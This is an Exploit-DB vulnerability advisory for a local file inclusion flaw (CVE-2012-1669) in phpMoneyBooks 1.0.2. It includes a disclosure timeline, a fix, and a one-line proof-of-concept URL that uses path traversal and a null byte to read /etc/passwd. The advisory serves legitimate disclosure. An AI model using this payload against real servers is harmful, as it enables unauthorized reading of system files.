phpMoneyBooks 1.0.2 - Local File Inclusion

EDB-ID:

18648




Platform:

PHP

Date:

2012-03-22


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - mark.stanislav@gmail.com


I. DESCRIPTION
---------------------------------------
A vulnerability exists in index.php for module handling that allows for local file inclusion using a null-byte attack on the 'module' GET parameter.

 
II. TESTED VERSION
---------------------------------------
1.0.2


III. PoC EXPLOIT
---------------------------------------
http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00


IV. NOTES 
---------------------------------------
* magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for null-byte attacks to work


V. SOLUTION
---------------------------------------
Upgrade to 1.0.3 or above.


VI. REFERENCES
---------------------------------------
http://phpmoneybooks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669


VII. TIMELINE
---------------------------------------
02/29/2012 - Initial vendor disclosure
03/01/2012 - Vendor patched and released an updated version
03/22/2012 - Public disclosure